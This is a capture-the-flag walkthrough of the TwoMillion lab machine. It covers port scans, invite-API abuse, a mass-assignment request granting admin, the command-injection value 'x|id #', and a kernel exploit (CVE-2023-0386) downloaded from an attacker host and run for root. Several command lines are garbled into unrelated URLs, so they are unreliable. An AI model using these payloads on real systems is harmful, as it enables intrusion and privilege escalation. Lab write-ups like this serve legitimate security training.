Information Gathering

IP Address	Opening Ports
10.10.11.221	TCP:22,80

$ sudo masscan -p1-65535,U:1-65535 10.10.11.221 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.221

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
ssh-hostkey: 
256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx
|_http-title: Did not follow redirect to http://2million.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

JS Code Deobfuscation && Unauthorized API Access RCE

# echo '10.10.11.221 2million.htb'>>/etc/hosts

$ dirsearch -u http://2million.htb

view-source:http://2million.htb/js/inviteapi.min.js

JavaScript Code Obfuscation Analysis

function verifyInviteCode(code) {
    var formData = { "code": code };
    $.ajax({
        type: "POST",
        dataType: "json",
        data: formData,
        url: '/api/v1/invite/verify',
        success: function(response) {
            console.log(response);
        ,
        error: function(response) {
            console.log(response);
        }
    });
}

function makeInviteCode() {
    $.ajax({
        type: "POST",
        dataType: "json",
        url: '/api/v1/invite/generate',
        success: function(response) {
            console.log(response);
        ,
        error: function(response) {
            console.log(response);
        }
    });
}

$ echo 'Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr'|tr 'A-Za-z' 'N-ZA-Mn-za-m'

POST /api/v1/invite/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

DATV8-W1GS1-U5MY1-E43OY

http://2million.htb/home

用户 API

请求方式	路由	说明
GET	`/api/v1`	路由列表
GET	`/api/v1/invite/how/to/generate`	邀邀请码生成说明
GET	`/api/v1/invite/generate`	生成邀请码
GET	`/api/v1/invite/verify`	验证邀请码
GET	`/api/v1/user/auth`	检查用户是否已认证
GET	`/api/v1/user/vpn/generate`	生成新的 VPN 配置
GET	`/api/v1/user/vpn/regenerate`	重新生成 VPN 配置
GET	`/api/v1/user/vpn/download`	下载 OVPN 文件
POST	`/api/v1/user/register`	注册新用户
POST	`/api/v1/user/login`	登录已有用户

管理员 API

请求方式	路由	说明
GET	`/api/v1/admin/auth`	检查用户是否为管理员
POST	`/api/v1/admin/vpn/generate`	为特定用户生成 VPN
PUT	`/api/v1/admin/settings/update`	更新用户设置

GET /api/v1/user/vpn/download HTTP/1.1

openvpn配置文件

查看权限

升级管理员

PUT /api/v1/admin/settings/update HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 47


{
"email":"maptnh@gmail.com",
"is_admin":1
}

POST /api/v1/admin/vpn/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 35


{
"username":"maptnh@gmail.com"
}

{
"username":"x|id #"
}

username:admin
password:SuperDuperPass123

$ ssh admin@10.10.11.221

User.txt

6a9c99994e4334df9edc1fc13bca997b

Privilege Escalation: OverlayFS

There is an email in /var/spool/mail/admin

From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm aware you're working as fast as you can to complete the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't be compromised by that.

HTB Godfather

Mentioned OverlayFS / FUSE vulnerability

$ git clone https://github.com/puckiestyle/CVE-2023-0386.git

$ tar -czvf CVE-2023-0386.tar.gz https://www.freebuf.com/articles/es/CVE-2023-0386

admin@2million:/tmp$ wget http://10.10.16.16/CVE-2023-0386.tar.gz

admin@2million:/tmp$ tar -zxvf CVE-2023-0386.tar.gz

admin@2million:/tmp/CVE-2023-0386$ make all

admin@2million:/tmp/CVE-2023-0386$ https://www.freebuf.com/articles/es/fuse https://www.freebuf.com/articles/es/ovlcap/lower https://www.freebuf.com/articles/es/gc

admin@2million:/tmp/CVE-2023-0386$ https://www.freebuf.com/articles/es/exp